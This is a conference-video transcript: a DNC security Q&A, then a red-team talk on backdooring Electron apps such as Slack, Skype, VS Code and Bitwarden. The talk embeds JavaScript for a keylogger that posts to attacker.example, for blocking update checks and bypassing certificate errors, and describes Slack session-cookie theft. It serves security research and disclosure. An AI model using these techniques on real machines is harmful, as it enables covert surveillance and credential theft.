
BSides Las Vegas 2019 D1 - Breaking Ground

BSides Las Vegas · 8:11:50 · 977 views · Published 2019-08

Check one, two, two, two. Check one, two, two. Check. All right, is this thing on? Awesome, excellent. Thanks for coming, folks. It's a big room. Bring it on up. Come on. You're all way the hell back there. Oh, well. So you're not here to listen to me, so I'm just going to let him talk. Hello, I'm Bob. Okay, so I think this is the part where you can ask questions, and I will say, oh, my God, you're the smart ones. You tell me. Question. Yeah. Yeah, so hiring is... So we're going to have you repeat that question so everybody can hear. So I looked at democrats.org slash jobs, and I noticed that there were no security postings. What can we do about that, or do I just email you

directly? Yes, you can email me. So we have filled the roles that we have, but obviously... So, interesting factoid: the DNC is roughly 200 people. I forget what the... real number is. If you think about the combined organization that I left, which was AOL plus Yahoo, that's almost as big. The security team there is almost the same size as all of the DNC. So I'm never going to get the funding to go hire another 10 people. It's just not going to happen. So what we have to figure out is how to fill this role. So a lot of people have said, I'd like to volunteer. And up until recently, we haven't had

enough of the right foundation in place, with the right permanent people, in order to take advantage of people who wanted to volunteer. Now, some people may just want to quit their jobs and help, and there may be places where I can help you all, so tweet at me and I'll send you my email address. But it's an interesting thing where a lot of people said, "Oh, I want to volunteer a few hours here and there and do X, Y, and Z." But if you don't have the foundation, it's really hard. And part of the foundation is, like I said, there's people, process, and technology. So a lot of what we have to do is work

with the various teams, and that means getting to know the teams and what is their history, where is their technical debt, where is their process debt. And all of that just takes a lot of time. So we haven't been in the place where there has been a shepherd who could then say, okay, you're the expert in this thing. Go. So we can't have like 20 people just coming, logging in and trying to help. That wouldn't actually help. That would slow things down. Sort of like The Mythical Man-Month; are you familiar with that book? Anybody read that book? Oh, it's a classic. It's a short read.

The quick summary there is, you know, adding people slows you down, it doesn't speed you up. But it has other benefits, so I feel like we're kind of in that position now. But yeah, I'd love to hear from more people who would like to help and in what way they'd like to help. And as we get further into the election cycle, as we go from two dozen candidates to a smaller number, those opportunities may appear a little bit more clearly than they are today. Two dozen is a little bit rough. But having said that, if there's a candidate that you know, I would never stop you from reaching out to the candidate and to the

campaign and saying like, I can do this. But I also, you know, hopefully that came through in the talk. A lot of the stuff that really needs to get done is some foundational, real basic stuff. And so I just, you know, want people to understand: you may be giving the talk on malware reverse engineering, and you've got new techniques and a new code base that you're releasing open source today. And we really need you to help figure out why my password doesn't work for the database. That's just the practical reality of dealing with non-technical organizations that are distributed. That's kind of the challenge that we're up against. It's a good challenge, but it's a

little bit rough. - Alright, so for anybody who wasn't here, I'm gonna set this microphone right here. If you have a question, come on up, ask your question on the mic, then put it down and take your answer, okay?

Good morning. I sent you a note on idler.com about volunteering. You answered some of those questions in your presentation. I mentioned Maciej Cegłowski's site, and for anybody who doesn't know, he's got a couple of essays on working on a campaign that are very good. It's idlewords.com. You mentioned DigiDems, and Mr. Cegłowski does as well; you mentioned that they hired 81 people for 2018. There are 435 House seats, there are 33 or 34 Senate seats, there are 50 states. So it seems like there's a disconnect there. I'm a semi-retired IT professional. I've got time, and I can volunteer locally, and I will do that. But I've got a lot more cycles than the local campaigns are going to consume. So how do we match up the people

that have the time and this apparent disconnect between the number of people available and the number of needs that are out there. - Yeah, so that's a great observation. So I don't run the Digidem so I can't really speak for them, but obviously finite resources mean finite number of campaigns. And so I think we're really counting on the people who within that community are thinking about which are the battleground states, which are the highest priority ones, that they're gonna be doing a good job of that. Again, I majored in political science, but I'm not gonna be the person to say which states are the most important states for people to place these resources in. I'm

gonna let people who have done that multiple times do that. So I think it's really a matter of resource allocation. And then groups like Ragtag actually do have a process where you can apply to be a Ragtag volunteer and they'll do their best to hook you up with various campaigns. That's a partial solution, but there's no one correct solution. So when I said I really want people to think about, you know, just keep trying, I talked to a few people who applied to the DNC, it's like, ah, we have so few roles, it has to be a really, really strong match, otherwise, I can't bring you on. I don't have 150, 200 people you know

heads, so we have to hire very carefully. But I tell them, I don't want you to be discouraged; this is one way that you can contribute, and there are a thousand others, and I only know of a few of them, so keep looking. So part of the answer is (and I'll reply to your mail at some point when I can get caught up) that I really want people to make it a project to keep looking. It's not like you strike out once and you're done; you continue to try. This is messy and it's organic, and whatever you come up with will be obvious in

retrospect, but I can't predict what that will be for you and for the organization you end up protecting. So just keep trying, please. We need more people to do that sort of thing. So thank you for the work you've already done. Yeah, jump on in. Hi, good morning. I'm Jack. First of all, I guess thank you for what you do, because I think InfoSec pros leaving Silicon Valley and working for the civil society side of things is really important; it's the only way this starts to change. I don't know if anyone tells you that, but thank you. What sort of outreach... I was pleasantly surprised by how much outreach occurs to support the campaigns, like

DigiDems, but once the blue wave's in office, what's being done at the state and local level, or anything in terms of similar support? Yeah, thanks. - Yeah, so again, it's very interesting. When I started, it was obvious that I had to work to protect the DNC. And the other interesting thing about working in my role is I don't have to be coy with anybody about the hand I was dealt; it's the subject of books and articles and things like that. We've been working really hard to continue to evolve, modernize a lot of systems, try to cut technical debt. But not long after I started and got my sea legs, Tom Perez, the chair, made sure I understood that helping the state parties

was going to be a very high leverage thing. And so not just protecting them, but giving them some of the tools to be able to help campaigns as they were starting again. How many campaigns are there in any major year? A bajillion, up and down the ballot. So it's not just the presidentials that we're worried about. I mean, all the way down to school board, that kind of thing. So the trick for us is to try to figure out how to be high leverage. And so we did a lot of that work in the midterms. But again, I was just kind of guessing, like maybe people will want a webinar on, you know, doing this.

And like maybe we bring in the social media companies and have them do a webinar. I don't know. We're making this stuff as we go along. And then we took the stuff that we thought resonated with people and then we've really polished that. So we've been really pushing not just the presidential campaigns, but we've gone back and now we're cycling through all of the presentations, making sure the state parties are aware of this. Now I have email blasts that we send out. I didn't have time to talk about this, but we also have this email list that we send out to them to say, if you see anything that's suspicious, please let us know, even

if you've dealt with it, even if you've resolved it, even if it was nothing, send us a note so that we can then think about that in the broader context. Lo and behold, a bunch of people then sent out a thing saying, ah, this is nothing, but we have this thing. Like, oh, well, a bunch of campaigns are having this thing. Yeah, a weird call from Russia. That's weird, okay. Then a second campaign or state comes in with one, oh, okay. So now you start to see a pattern that they never would have seen. And so we're trying to build up a federation of people who are involved and know how to start asking some of the right questions. I

try to respond personally to as many of these alerts as I can get. You can probably guess that sometimes they send me their spam. Like, I don't need this, that's okay. It's suspicious, yeah, but they're just trying to sell you whatever. And so I try to teach them what it is that I look for and try to build up that confidence so that when something bad happens, they really do rope us in. So again, is that like an ironclad strategy with clear deliverables and results? No. But we're trying to take into account that this is a messy, organic system and that we have to start infusing it as best we can. So working with

some of these partners is gonna help, but yeah, so it's messy. And I'll just tell you, it's messy, it's organic. And the things that I will tell you next year that worked or didn't work will probably surprise me. I think I know what's gonna happen and the one thing I've learned in this job is I will be surprised. How do you manage candidates that don't prioritize their own personal security like their own Facebook accounts or whatever they've had up? You've done something in this space. What tell me your background? I like working in a corporate environment and some really awkward executives that Might not want to have their own so your hypothesis is that? Like senior people in a campaign would kind of have some

of the same behaviors as senior people in an organization? Interesting theory. So, again, I don't have agents on everybody's machines, so I can't tell for sure, but we do try to lean in a little bit. It's like I'm the personal trainer for the campaigns and for the state parties, and your personal trainer is going to tell you to eat right and don't drink too much and stop smoking and all that stuff. And so I have to find a way to explain, sort of let them understand: I'm here for you, I'm gonna give you the same message over and over again, because eating right and exercising is kind of what you have to do.

I don't know any shortcuts. But I want to build credibility with them so that I can occasionally lean in to figure out what's really going on, to build that trust so they know I'm not gonna narc on them, I'm not gonna share information between parties, between campaigns. We have very strict confidentiality rules. So the good news is that we have some good evidence that the senior people are taking it seriously, and I don't know if that's -- I'm not going to take credit for that. It may simply be the climate. It may simply be that there are, you know, Mueller reports that come out that happen to pertain to this space, and you don't

have that in the industry that you work in. So, again, when I said I wanted to tell you the Yahoo story: even though it's all public, most people don't know it, and telling these larger stories is actually part of that. So it may be that they're more sensitized; I'm not really sure. But yeah, working with very busy people is very hard, so we work with a security person, a point of contact. We have the top 10 things you need to do to run a secure organization, and number one is have somebody in charge. And so for each of the campaigns, we have somebody who's in charge that we can work with. And

it doesn't have to be somebody who's a cybersecurity expert. It can simply be a really great project manager who can then go around and make sure that all of this stuff gets done. And so, so far so good, but again, I can't see everything because they're not remote offices and I'm not headquarters. But so far so good. Five minutes? Okay. Next question.

I have a question about data accumulation by campaigns. And it's kind of a big question. Say it again, about what? Data accumulation by campaigns. So it's kind of a big question, and I'll try and keep it as succinct as I can, but it's not my strong point. It seems like there's a lot of election tech springing up, which revolves around political partisan campaigns accumulating as much data as they can on electors so that they can target them as best they can. It seems to happen on all sides of politics. And I just wonder, as a trend, collecting huge amounts of data, cross-referencing it with other data sets, is it something that causes you any concern

in terms of that being a potential-- well, a lot of data that will be obtained by someone who shouldn't get it in the end? Yeah, so thanks for that. So one of the things that I've noticed is that there's-- so yes, obviously, I'm a security guy. I'm concerned about everything. So if you ask me, Bob, are you concerned about something? Of course. So a lot of the data is actually public data. And that's not widely known. And so we sometimes have a mismatch between what is actually private and what is not and what people's expectation is. Not usually, I mean you generally speaking know that when you go in and fill out a form to register to vote that that information is used in a certain way and

it's given to political parties. But sometimes there's a little bit of a disconnect there. But yeah, I think we need to continue to evolve our thinking in terms of what is PII. I mean, think about this: the notion of public has really changed without us having the language for it. Over the last several years, since the advent of the internet, we haven't really kept up with our mental models. So it used to be that if you wanted to know how much I paid for my house, you could fly to San Francisco. You could go to City Hall between 10 a.m. and 4 p.m., you know, modulo holidays or people feeling like they didn't want to work

that day. So you could go figure it out. You could just ask them. But now we have a world in which you can go figure that out before I exit the door. And it's public information, but those seem very different to me. And so I think there's this larger conversation around what is public, what is not, that we have, and we don't have language really to deal with that. But point taken, yeah. Oh, sure. And then I think we have one last question. What I was thinking of is there seems to be kind of an explosion of kind of canvassing recording apps. So, for instance, if I go and knock on your door and I say, are you planning on voting for candidate A, B or C?

Then, after you give me the answer to that question, just one person to another, I'll go and enter that into some of these apps. And so I've got a sort of a situation where there's potentially kind of an arms race, I guess, between Dems and Republicans, where we might all agree that... that's information that might not be public, but I've given it to a stranger. Maybe we shouldn't be accumulating it, but on the other hand, both parties want to accumulate that information, and neither one probably wants to be the one who says, well, we'll accumulate less. Yeah, I mean, it's obviously a far more nuanced conversation that would

have to involve people who actually do the data analytics and the collection and the enrichment of all that stuff. You as a person who's told somebody who knocks on your door or somebody who calls you or texts you, telling them that you don't plan to vote for this candidate or you're not a Democrat is actually valuable information 'cause it means we'll stop bugging you. So I think it's, you know, it kind of works both ways. So the last thing you want is every campaign to constantly call you because there's no predictive analytics around whether or not you're going to be amenable to having the conversation. So again, I'm not the data analyst. I don't even

play one on TV, to be honest with you, but I think it's one of these things where there are some real benefits to collecting and sharing that information. But you're absolutely right. This is a new world of data, and obviously there have been some high profile events around data acquisition and manipulation. So yeah, I think we have to continue to be vigilant. Okay, last question, if any. I think they want you to go to the microphone. It's exciting. So I hear you have like a really awesome vintage crypto collection. This is true. This is true. What do you have in your collection, sir? So I started collecting back at Netscape, which was the company that made a $35 browser. And so I started collecting, my first

item was an M-209, an old Army device, many of which were made by the Smith Corona Corporation, and if you think about it, it kind of makes sense, 'cause you need the same kind of skills to design, build, and roll out something that is a mechanical device. So it has little cipher wheels and you can encrypt and decrypt. And I was just fascinated by this. One of the things I really like about it, now that you ask, and none of you care a damn about this, but one of the things I like about it is when you encrypt, the ciphertext is put into blocks of five characters and then a space

and five characters. I thought, well, that's weird. It must be a bug. And then I started researching this and I was like, no, it's not a bug. You need to now give this to the teletype guy who's going to then wire this via Morse code and it's just easier than just a long string of characters. So you break it up. But when you decrypt it, it doesn't do that. It actually now looks like regular English text. They put this into hardware. Like what? That's crazy difficult. And there's all sorts of little flourishes on the thing. So I got the bug and I fell in with a group of misfit crypto collectors and just started buying

a few other things here and there. And to answer the obvious question, yes, I have an Enigma. I know you're all wondering: do you have an Enigma? Okay, I think that's it. So thank you all. Thank you for coming. I'm so honored. Really, really, thank you. And please, please, please find a way to contribute. Don't let me do this alone. No. No. Good morning. Welcome to BSides Las Vegas Breaking Ground. This is Pavel, and he'll be giving a talk on BEEMKA: Electron post-exploitation when the land is dry. But first, a few announcements. We'd like to thank our sponsors and volunteers, without whom this event couldn't happen, especially Critical Stack and Valimail and Amazon and BlackBerry

and the NSA. These talks are being streamed and recorded, so please don't use your cell phones. And if you have questions... Pavel, do you want questions during your talk or after? If you have questions, raise your hand and I will bring the microphone over to you. Thank you. Hi, everyone. My name is Pavel Tsakalidis and I'm a senior consultant for Context Information Security, which is based in London. So before I begin: when I was making the presentation, I was given two pieces of advice. One was that I should start with a joke. And the second was that I should practice, that I should record the whole thing and then just do the cycle again and again until I'm happy with the result. But by recording

my presentation and listening back to it, what happened was that I heard my own voice, and I heard how I sound to the outside world. So instead of starting with a joke, I'll start with an apology, because I have no control over my voice. Having said that, today I'll be talking about Electron post-exploitation when the land is dry, and I will also introduce a tool that makes the whole process a bit easier. So let's assume that you are on a red team job: you have done your phishing campaign, somebody just opened the Word document, and you get a beacon back. The next sensible step would be to try and find a way to persist on the system. But let's assume that the

endpoint is running some sort of endpoint protection that you've never heard of, never seen before in your life, and just blocking most of the things you try to do to kind of start it on when the machine boots. That is where Electron applications come into play. And I will start straight away with a demo to display how it works in action, and then we're going to discuss how it can be exploited.

So, on the right-hand side, we have the victim. On the left-hand side, we have the listener that the attacker has set up. At this point, let's assume the application is already backdoored (don't pay attention to the command line), and when the user logs in, we will see that on the left we get a reverse shell back. This runs Ubuntu, and we can see that Skype runs without any sort of warnings; however, we get a shell back. This works across all operating systems, as long as the application is built with Electron. So now we're going to see how we can actually achieve that. These are some popular desktop applications that have been built with Electron. The

ones that stand out are Slack, Signal, Visual Studio Code, and Skype. In this instance, it is worth mentioning that Skype has three versions. One version is Skype for Business; this one is not built with Electron. The second version is the one in the Windows 10 App Store, and that as well is not built with Electron. The third one is the one you download from the website, and that's the one that's built with Electron. So that's the only one that's vulnerable across operating systems. So what exactly is Electron, and why do more and more companies use it? It practically runs Node.js in the back end and Chrome in the front end, and it's effectively Chrome in a box. So any Electron application you have running,

it's practically a Chrome browser running alongside everything else. It was developed by GitHub around 2013, and I think their first big project was Atom, the Atom browser... the Atom code editor, sorry. So why do more and more companies use it? Well, the answer is quite obvious: because it's cost-effective. You just write it once and then cross-compile for every operating system you want to support. And then you do not need to hire additional software developers; you can just take the code you use on your website, put it in the Electron application, and that's it. So this is an example of what Skype looks like. You can practically open Skype and

press Ctrl+Shift+I and the developer console will open. So you can see there's the inspector, elements, the network manager; it's effectively Chrome. That's pretty much what it is. So to understand what makes this attack possible, we'll have to discuss how Electron actually works. Electron is based on ASAR files, and an ASAR file is just another compressed-archive format, like ZIP or TAR or anything like that. So when you double-click on an app, the first thing it does is run Chromium and Node.js, it kind of spins that up, and then it loads its bootloader (it's easier to understand it that way) from electron.asar. Once the environment is ready, because what electron.asar does is

it prepares the whole environment for the application to be loaded. Once that's done, app.asar is loaded, which is effectively the source code of the application. If you open app.asar, it's effectively a web root: there's an index.html file, which is the file that's loaded, and then everything else is loaded after that. Here are some facts about ASAR files. They're not encrypted, they're not signed, and they're not scanned by AV software: ZIP archives are scanned, and RAR and ACE and TAR and everything else, but ASAR files are not, and they're not even encrypted. And the last and most important one, the reason why this whole presentation came to be, is that there are no

integrity checks in place to make sure that once you install something that it's right there, right in the format that it should be.

So here I made an example file where I took an ASAR test file, put it in an archive, and uploaded it to VirusTotal. And of the 50-odd engines, only five of them identified it. And I was quite surprised that Baidu, in China, has that already; they are already scanning those kinds of files. And I think three out of those five products are from China. So it might make someone think: why do Chinese products scan that and nothing else does? So, developers are weird creatures. We try to protect the source code and hide the source code, make sure nothing is changed, nothing is edited, modified, or whatever. However, there have been

a lot of developers coming forward and saying, "Can we encrypt the source files, or protect the source files, or do something so that someone might not be able to change them?" And the destiny of all those issues is that they end up closed, because the answer is, "Well, no, if you want to do it, you have to do it yourself. This is how Electron works, and this is how it will work." So, the tool. I believe pretty much all of us here have at some point written a script or a tool or some sort of application, and then once we have it, we have to find a really cool name for it. I went the other way.

I always had BEEMKA, because I had a teddy bear called Beemka when I was young, and I really wanted to use this name. So I have almost managed to make it happen. At the moment, BEEMKA stands for Basic Electron Exploitation Modular, and then I will need your help on the KA. I'm happy to accept any recommendations afterwards, and I will reward anyone that has suggestions with a beverage of your own choosing; I'm happy to bribe people to get it working. And out of the box, at the moment, what it does is: you can install keyloggers, take screenshots of the application or the entire desktop, inject operating system commands, access devices, and

you can create targeted modules for applications. I think the most interesting part of that is the targeted modules. And here we're going to see an example where an attacker can egress source code files from Visual Studio Code.

Once again, on the right there's the attacker's endpoint, and on the left is the developer, who just runs Visual Studio Code. As you can see, no warnings, nothing came up, everything's fine. And then the developer starts opening files. This module is designed to only exfiltrate open tabs, rather than the whole directory structure. So you can see that on the right, files are beginning to appear, and those are the ones that have been opened by the developer. And by just clicking on a file, we can see its contents. If someone wanted to take this a step further, they could just inject code into the source files. And because Visual Studio Code probably has everything already unlocked and ready for the developer to use, they could just do

a git commit and just push to master. Well, assuming that that company doesn't have code review process and all that. But if someone is not careful enough, you may end up with code in your production environment that shouldn't be there.
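The heart of an open-tabs-only module like the one demoed is just remembering which files have already been reported. A minimal sketch of that bookkeeping follows; the names are hypothetical, and the real module would run this on an interval inside the application's context and send each new file's contents to the attacker's listener:

```javascript
// Bookkeeping for an "open tabs only" exfiltration module, as described:
// poll the editor's open files and report only the ones not seen before.
// Names are hypothetical; the actual module's internals may differ.
const seen = new Set();

function newlyOpened(openFiles) {
  // Return the files we have not reported yet, and remember them.
  const fresh = openFiles.filter((f) => !seen.has(f));
  for (const f of fresh) seen.add(f);
  return fresh;
}
```

Reporting only the delta keeps the exfiltration traffic small, which is why the demo shows files appearing one by one as the developer opens them.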

So once I built the tool, I was like, I'm gonna play it safe. I'm just gonna contact the Electron team and tell them, this is what I did, this is the reason how it came to be, do you think it should be fixed or if something should be done? And this is the response I got from them. Yes, the slide is empty because I got no response at all. So at that moment I said, okay fair game, it's not a bug, it's a feature, so I'll just keep going with the whole process. So how does it actually work? I really hope at this point I could say that there's some magic that was done and that I did something cool and I found a really cool trick

or something. No, there's nothing like that. You can just take electron.asar, unpack it, modify a file, put in your payload, and then pack it again, and that's the end of it. So when you unpack electron.asar, there are a lot of files that can be used. I will have one. Thank you. One bowl with no yellow M&Ms. Why not? Oh, did I put that in? Yeah, so apparently I put in as a requirement that I don't want yellow M&Ms, and it actually happened. OK, thank you. So there are a lot of files that someone can edit to inject their payload into. However, I found that the most reliable one is chrome-extension.js. So, Electron offers a number of

APIs, a number of event listeners that you can trigger when the application loads. One of them is application ready, or window created. The way it works is: you run the Electron app, that's the application, then you open a window, and then you have the web contents. That's kind of the format of it. And then you just pack the file, put it back in its place, and wait for the user to run the application. This is some basic functionality that BEEMKA has. One is to unpack or pack a file, in case you don't want to unpack Electron but just unpack the application itself and see what it does, and maybe find an XSS that nobody knew was there, whatever you want to do. And

then there's the injection, where you can just take a module and inject it inside Electron. When you run inject, you don't have to run unpack, inject, pack; you can just do inject and it does everything for you. At this point, I would like to be able to say that there is sufficient documentation on how to write your own module. However, there isn't. So if you want to build a module, just have a look at the existing modules and see how those work and try to figure it out, or just drop me a line and I will help you. So this is what an electron.asar file looks like: a lot of folders, a lot of JavaScript files, and you can do whatever you want

with it. So, payloads. Does anyone here hate JavaScript with a passion like I do? Yeah. If someone has never used JavaScript, imagine Java and PHP getting together, having a stroke, then having another stroke. Okay, I'm going to leave it at two strokes. That's what JavaScript is. So all payloads are written in JavaScript, all of them. And there are two ways you can execute something from Electron. One of them is from within the context of the application, so you just inject JavaScript inside the application. And the other one is within the context of Electron, so that's kind of one step behind, on the Node.js level. So here's how the application-context injection works. It's plain JavaScript: whatever works in Chrome will work in

Electron. So instead of trying to find an XSS endpoint, an XSS vulnerability, and exploiting that, you can just inject it straight away inside the application. And long story short, if you want to load the whole of jQuery and update the whole interface of the application, you can do that. And then there are extra bits that you can call from within the application's context that will give you more functionality, like reading files or accessing devices. The Visual Studio Code egress that we saw is from the application's context. There was just code inside that was running on an interval, checking when a file is open, then reading the file system, getting the file, and exfiltrating it back. There are some restrictions though. So if the application is

using CSP headers, you will not be able to do any POST requests, any AJAX requests, back to your endpoint. Those can obviously be bypassed by updating the hosts file, but then the game is on a whole different level, and it's not just in that application. Skype, for example, is using CSP, but not in the HTTP headers — it's using it within a meta tag, which I couldn't find a way to bypass. Electron offers you some API manipulation techniques where you can just remove HTTP headers, but it doesn't allow you to update the file that's coming back — to update half the response. And then we have webviews that cannot be accessed. A webview is like a sandbox that runs on a

different process ID within Electron. Slack, in this case, is using webviews, so you cannot install something within the application's context. You can't install the keylogger, because the keylogger is effectively JavaScript that just listens on key-up and grabs all the keystrokes. But that does not mean that you cannot execute anything within the Electron context — like a reverse shell, like Skype, for example, because the Skype backdoor was not in the application's context, it was in the Electron context.
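The application-context keylogger mentioned here really is just a key-up listener plus an exfiltration call. Below is a minimal sketch of the idea — the KeyBuffer helper and the attacker.example endpoint are invented for illustration, not BEEMKA's actual payload; the DOM wiring only attaches when a document object exists:

```javascript
// Minimal sketch of an application-context keylogger payload: buffer
// keystrokes, then ship a batch out. Everything is DOM-level JavaScript,
// no native hooks — which is why webviews, which wall off the
// application's context, are enough to block it.
class KeyBuffer {
  constructor(limit = 32) {
    this.limit = limit; // flush after this many keystrokes
    this.keys = [];
  }
  push(key) {
    this.keys.push(key);
    return this.keys.length >= this.limit ? this.flush() : null;
  }
  flush() {
    const batch = this.keys.join('');
    this.keys = [];
    return batch; // in a real payload this batch would be POSTed out
  }
}

if (typeof document !== 'undefined') {
  // Inside an Electron renderer this is all the wiring it takes.
  const buf = new KeyBuffer();
  document.addEventListener('keyup', (e) => {
    const batch = buf.push(e.key);
    if (batch) fetch('https://attacker.example/log', { method: 'POST', body: batch });
  });
}
```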

So here's how the Electron-context payloads work. It's still JavaScript — Node.js this time — and there's more functionality, from the perspective of the server side of things. So you can intercept or block HTTP requests. This means that when the application runs and checks if there are new updates, you can either block that request, and then the application will think, okay, I'm on the latest and greatest version, no need to update. Or you can spoof that whole request and redirect the user to an update that's yours. That second case would be, I think, more dangerous, because that way someone might just install, with administrative privileges, a new backdoor. And then another interesting bit: because it's still a browser that's running,

if it tries to communicate with an endpoint that has self-signed certificates, it will just stop you. It will just say, "Sorry, it doesn't work." There are event handlers that are triggered every time something doesn't work — like, for example, the certificates — and you can just instruct it to bypass that. So if you have an endpoint that is just an IP address and you can't install a valid SSL certificate, you can just install this event handler and your request will go through. Now, what do you need to make this work? Well, obviously you need local access, like we discussed in the red-team scenario before, and you need write access to the installation folder.
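Put together, an Electron-context payload that swallows update checks and accepts self-signed certificates might look like the sketch below. The event names (`onBeforeRequest`, `certificate-error`) are Electron's real ones, but the update host and the overall wiring are assumptions for illustration; the require is guarded so the URL helper also works outside Electron:

```javascript
// Sketch of an Electron-context payload combining the two tricks just
// described: block the app's update checks and accept self-signed
// certificates (e.g. for a bare-IP C2 endpoint).
const UPDATE_HOSTS = ['updates.example.com']; // hypothetical update endpoint

function isUpdateCheck(url) {
  try {
    return UPDATE_HOSTS.includes(new URL(url).hostname);
  } catch (e) {
    return false; // not a parseable URL
  }
}

let electron = null;
try { electron = require('electron'); } catch (e) { /* plain Node.js */ }

if (electron && electron.app) {
  const { app, session } = electron;
  app.whenReady().then(() => {
    // Cancelled update checks make the app believe it is already on the
    // latest version.
    session.defaultSession.webRequest.onBeforeRequest((details, callback) => {
      callback({ cancel: isUpdateCheck(details.url) });
    });
  });
  // Fires whenever certificate verification fails, e.g. a self-signed
  // certificate; trusting it lets the request go through anyway.
  app.on('certificate-error', (event, webContents, url, error, cert, callback) => {
    event.preventDefault();
    callback(true);
  });
}
```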

On Windows it's easier, because if an Electron installer detects that you are a low-privilege user, it will just install into AppData, and therefore you have access to write in that directory. But most installers also offer you the capability to install across the whole system. In that case, it will go to Program Files, which makes life a little bit more difficult. On Linux and Macs, because you need elevated privileges to install something, it will be a little bit more complicated. Now, ways to exploit — and this is where it gets interesting. So, you can run operating system commands, you can do anything you want; however, the executable is not modified. So the hash of the file — of slack.exe or skype.exe or the VS Code exe —

remains exactly the same. What it does is you just instruct a totally legit application to run something that you want it to run, and it's just going to do it. So we have gone to great lengths to create AppLocker and whitelisting and blacklisting and all that kind of thing, and in-memory patch protection and reverse-engineering protection and encrypting the exe files and everything — and then you have something like this, where you just leave the application as is, but you can run whatever you want on the side. Another valid attack would be to redistribute a malicious application. That way someone will just download the installer; the installer will obviously not be signed, but how many times do we

actually check if something is signed? Just click the yes button and it installs. But the installed application, like slack.exe, will still be signed, therefore it will bypass any whitelisting restrictions you have, or anything you have on that box. Another interesting way to attack something: you gain access to data that you previously did not have access to — for example, passwords within a password manager, or messages within Slack. And last but not least, you can spy on the user using the web camera, screenshots, or microphone, or whatever you want. Someone might argue here that this is called gathering intel on the target. Society calls this stalking, and it's not cool and should be avoided at all

costs. So here's an example of how we can egress stored passwords within Bitwarden. Does anybody use Bitwarden? Nice. Don't use the desktop app. So here again, on one side we have the user, and on the other side we have the attacker's endpoint. As we can see, the user will just unlock their vault — we don't care about this password, because it's what's inside that counts — and once unlocked, everything will be egressed back to the attacker. And as simple as that, you have just lost all your passwords, because you installed a desktop app that has somehow been backdoored. Obviously, this doesn't work on the web versions of those apps. So what do these next-generation applications try

to achieve? The first thing is to bring the web to the desktop. I say leave the web in the web, but okay, fine. If companies want to save money by just building everything with JavaScript, that's fine with me. The source code is stored locally — again, that's fine with me — but it shouldn't be fine to not perform integrity checks on your files, because you expect you're running something, and then you have no control over what form it is in now, whether it has been backdoored. Another important thing is that you introduce a whole range of web vulnerabilities to the desktop. If you have an XSS vulnerability on a website, it's highly unlikely that you'll be affected on some

other website. Most of the time it just affects that specific website — unless someone drops a zero-day, and if someone drops a zero-day to get you, you probably have bigger problems than just using Electron. And then you can also use devices. If you do that on the web version of the application, Chrome will just pop up a box saying, "Do you want me to use the camera or microphone?" In Electron it doesn't. It just says, "Can I use the camera?" "Yes, here you go." The light of the camera will still turn on, so you're not bypassing that — it's just that you have no idea when it's enabled. Here's an example of a web vulnerability we take lightly, which

is when logged-in sessions are transferable — which is literally, like, a low-severity issue; we don't really care about it. But here's how it could work. A user is running a backdoored version of Slack, and they try to log in. However, this user is quite security aware, and they have two-factor authentication as well, so they feel pretty good about themselves. After putting the 2FA in, the user will be logged back into Slack. At this point, what the backdoor does is send all HTTP cookies and URLs back to the attacker's endpoint. So once someone's logged in, everything has already been sent out to the attacker — and it keeps sending, so nothing stops. And

here are all the cookies that have been sent, grouped by time. So we pick any of those, and we take the whole cookie. From this cookie — I realize I say cookie quite a lot — we just need b, d, and x. Next step: this video was done on the same machine, but it works across IP addresses; it's just easier to do a video on the same box. So what we do is recreate all those three cookies and give them access to slack.com and all subdomains. If you don't include all subdomains, you'll just end up in an infinite loop. So once you move all the cookies — yes, I could have

written a script to do this quicker, but I'm really good at copy-pasting and I wanted the whole world to see. So if you look on the top right, it says sign in and get started. Once all three cookies are in place — do you feel the suspense? — once it's refreshed, the top right becomes your workspaces, and by clicking it, you have just gained access to Slack. And because someone running a local version of Slack will not be logged out when they just shut down their machine, it means that you will have access here until the session expires. And if you keep using it, the session will probably never expire. Also, this is a good way to check if developers have shared passwords or API keys; if someone uploaded

a legal document or a contract or something, you can just access the whole history and do whatever you want. So how does the previous attack actually work? One of the API event handlers that Electron offers is onBeforeSendHeaders, which means that before any HTTP request is made, it goes through here. So what I do here is take the URL and the cookie and send them back to the attacker. Yes, it does duplicate all HTTP requests, but if we add some logic to it, we can just stop the moment we have everything we need. Also, it's worth mentioning that this happens on the application level, so there's no need to install

a system-wide proxy or something that the user will notice. If an attacker does it this way, it's completely transparent — they will never know what's happening. And if my endpoint, instead of example.com, is slackupdates.com or something strange like that, it will not be noticed, because they will think, okay, this is a legit Slack endpoint. So what are some ways to protect ourselves? At the moment, there isn't an official fix. However, Electron 6 was released last week, and I didn't have time to check if integrity checks have been implemented. Hopefully this will change. Another step is to install applications as the high-privileged user. This mostly applies on Windows. However, even by doing that, we can just hope that the attacker does not elevate their privileges, because once they

do — once they have write access to the folder — it's game over. Then we can monitor the process tree. This could work, I think. So if you see slack.exe running PowerShell, you can say, okay, this shouldn't happen, we should investigate. But if you look at the right, that's a legit Visual Studio Code process tree. It runs Git, it runs cmd.exe, it runs PowerShell, it runs everything. So it might be quite difficult to identify what's happening there. And this will only protect against command injection. If an attacker wants to make a C2 server and just use HTTP requests from within the app, you will never know, because it's Chrome itself that does all

the requests. And overall, if you can avoid it, don't install the desktop app — and yes, I am talking about Slack. Because if you have a web version of something that does exactly the same as the desktop version, at that point there is no reason to install the desktop version. Just use the web, because the browser will protect you, will sandbox everything, and will let you know if someone tries to access something that they shouldn't. Now, is it just Electron apps that are vulnerable to this, or similar attacks? No, because Spotify is not using Electron — Spotify is using the Chromium Embedded Framework, which is bare-metal Electron, so to speak. And instead of using asar files, they use the

so-called SPA files, which stands for Spotify app. However, if you rename an SPA file to .zip, you can just extract it, update index.html, put your hello world in, and that's it. I assume there could be some interesting attack vectors to be tested with Spotify. I haven't done any of that; I just realized that it's vulnerable as well and thought to mention it in case someone wanted to use it as homework. So the summary would be: if you are on the red team, or if you have compromised the host for whatever reason, and you want to either maintain persistence or just gain access to applications or data within the applications, you can just use an

Electron app that's installed. Most probably there will be some sort of Visual Studio Code or Slack or Signal or something like that installed on a corporate machine. Well, I don't think Signal would be on a corporate machine — but yeah, you get the point. Fortunately or unfortunately, this whole thing will stop existing the moment Electron adds an integrity check on those files. Because the moment they do that, you won't be able to change anything without actually changing the exe signature, which I think is the most important part of the whole attack. Yes, if you have sudo access or admin access on a host, you can do whatever you want, but

